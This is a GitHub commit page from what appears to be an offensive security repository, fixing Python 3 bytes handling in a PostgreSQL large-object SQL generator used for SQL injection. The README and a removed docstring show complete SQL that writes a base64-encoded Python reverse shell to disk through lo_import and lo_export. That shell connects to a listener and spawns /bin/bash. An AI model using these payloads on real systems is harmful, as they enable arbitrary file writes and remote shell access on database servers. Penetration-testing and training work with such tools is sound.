Skip to content

Commit b88e94e

Browse files
tree-chtsectree-chtsec
committed
handle py3 bytes to str
1 parent e50d00a commit b88e94e

File tree

2 files changed

+2
-12
lines changed

2 files changed

+2
-12
lines changed

README.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@ Postgresql Large Object 的 SQL 語法產生器
1919
```sql
2020
$ python sqli/pgsql/generate_sql.py --noloid --upload revshells/r.py -p d:/go.py
2121
select lo_import( 'c:/windows/win.ini', (select case when count (*) > 0 then MAX(CAST(loid as int))+1 else 1337 end from pg_largeobject));
22-
with LL as (select MAX(CAST(loid as int)) as gg from pg_largeobject) update pg_largeobject set data=decode('b'aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEyNy4wLjAuMSIsNDQ0NCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtpbXBvcnQgcHR5OyBwdHkuc3Bhd24oIi9iaW4vYmFzaCIpCg=='', 'base64') from LL where loid=LL.gg and pageno=0;
22+
with LL as (select MAX(CAST(loid as int)) as gg from pg_largeobject) update pg_largeobject set data=decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEyNy4wLjAuMSIsNDQ0NCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtpbXBvcnQgcHR5OyBwdHkuc3Bhd24oIi9iaW4vYmFzaCIpCg==', 'base64') from LL where loid=LL.gg and pageno=0;
2323
select lo_export((select MAX(CAST(loid as int)) as gg from pg_largeobject), 'd:/go.py');
2424
select lo_unlink((select MAX(CAST(loid as int)) as gg from pg_largeobject));
2525
```

sqli/pgsql/generate_sql.py

+1-11
Original file line numberDiff line numberDiff line change
@@ -30,7 +30,7 @@ def upload_with_lo(data, filepath, loid=None, page=2048, noSpecLoid=False, encod
3030
LOID = '(select MAX(CAST(loid as int)) as gg from pg_largeobject)'
3131
for i in range(0, len(data), page):
3232
if encoder == 'base64':
33-
_data = "decode('%s', 'base64')" % base64.b64encode(data[i:i+page])
33+
_data = "decode('%s', 'base64')" % base64.b64encode(data[i:i+page]).decode()
3434
else:
3535
_data = "decode('%s', 'hex')" % binascii.hexlify(data[i:i+page])
3636

@@ -75,13 +75,3 @@ def create_udf(filepath):
7575
print("\nwrite_text\n")
7676
print(write_text("hello world", "D:\\awae.txt"))
7777

78-
79-
'''
80-
Tree $ python3 sqli/pgsql/generate_sql.py --noloid --upload ../revshells/r.py -p d:/go.py
81-
remember to replace c:/windows/win.ini to /etc/hosts if target is Linux
82-
select lo_import( 'c:/windows/win.ini', (select case when count (*) > 0 then MAX(CAST(loid as int))+1 else 1337 end from pg_largeobject));
83-
with LL as (select MAX(CAST(loid as int)) as gg from pg_largeobject) update pg_largeobject set data=decode('b'aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjE5Mi4xNjguMTE5LjEzMiIsIDQ0NDUpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCIvYmluL2Jhc2giKQo='', 'base64') from LL where loid=LL.gg and pageno=0;
84-
select lo_export((select MAX(CAST(loid as int)) as gg from pg_largeobject), 'd:/go.py');
85-
select lo_unlink((select MAX(CAST(loid as int)) as gg from pg_largeobject));
86-
'''
87-

0 commit comments

Comments
 (0)